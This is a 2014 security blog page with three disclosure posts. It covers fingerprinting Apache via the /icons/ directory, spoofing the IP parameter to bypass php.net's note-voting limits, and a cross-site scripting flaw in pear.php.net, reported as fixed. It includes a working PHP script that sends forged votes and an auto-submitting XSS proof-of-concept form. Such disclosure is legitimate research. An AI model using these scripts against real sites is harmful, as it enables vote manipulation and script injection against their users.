Tuesday, April 22, 2014

Apache fingerprinting with icons directory

Sometimes webservers don't return "Server" header in HTTP response or return fake value. It doesn't increase security in any way and it's clear example of Security through obscurity, however some administrators want to hide this information or even change it to some odd values.

If you are one of them and you're running apache don't forget about default /icons/ alias. Anyone can use it to guess that you're using apache, for example:

http://apache.org/icons/apache_pb.gif

Directory content can be different between apache versions, so it also may reveal which version you are using.

For example:

Apache 2.2 (icons/apache_pb.gif):
Apache 2.2

Apache 2.4 (icons/apache_pb.gif):
Apache 2.2

For more differences you can take a look in apache source code repository history:
http://svn.apache.org/viewvc/httpd/httpd/trunk/docs/icons/

You can disable this alias in the httpd.conf file, simply comment out the line:
Alias /icons/ "/var/www/icons/"

Monday, April 21, 2014

Abusing PHP.net "User Contributed Notes" up/down voting system easier

On php.net website there is "User Contributed Notes" with up/down vote system. There is simple abuse protection mechanism that makes voting from the same IP address in short time unavailable. Look closer at "manual/vote-note.php":
...
$master_url = "http://master.php.net/entry/user-notes-vote.php";
...
$data = array(
              "noteid" => $_REQUEST['id'],
              "sect" => $_REQUEST['page'],
              "vote" => $_REQUEST['vote'],
              "ip" => $_SERVER['REMOTE_ADDR'],
         );
...
... $r = posttohost($master_url, $data) ...
And posttohost function from include include/posttohost.inc:
...
function posttohost($url, $data)
{
    $data = http_build_query($data);

    $opts = array(
        'method'  => 'POST',
        'header'  => 'Content-type: application/x-www-form-urlencoded',
        'content' => $data,
    );

    $ctx = stream_context_create(array('http' => $opts));

    $response_body = @file_get_contents($url, false, $ctx);

    return $response_body;
}
One of parameters sending to http://master.php.net/entry/user-notes-vote.php is IP addresss that can be easily spoofed - just forget about php.net/manual/vote-note.php and send POST request directly to http://master.php.net/entry/user-notes-vote.php (there is no validation, request source IP whitelisting etc).

<php
// demo
$url = 'http://master.php.net/entry/user-notes-vote.php';

$data = array('noteid' => /*NOTE_ID*/, 'sect'=>'/*SECT*/', 'vote' => '/*VOTE*/', 'ip'=>'/*SOME_RANDOM_IP*/');

$options = array(
   'http' => array(
        'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
        'method'  => 'POST',
        'content' => http_build_query($data),
    ),
);

$context  = stream_context_create($options);
$result = file_get_contents($url, false, $context);

echo $result;

pear.php.net XSS

Long time ago (28.06.2013) I found XSS bug in http://pear.php.net/support/lists.php. Email parameter was neither validated nor sanitized which resulted in XSS. Proof of concept was:
<head>
    <script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
</head>

<body> 
    <form method="post" action="http://pear.php.net/support/lists.php" id="form" style="display:none">
    <input name="maillist[pear-dev]" type="radio" value="normal" checked>
    <input type="text" name="email" size="30" value="<script>alert('xss');</script>">
    <input type="submit" name="action" value="Subscribe">
    </form>
</body>
 
<script>
     $('input[name=action]').click();
</script>
Fixed 08.07.2013.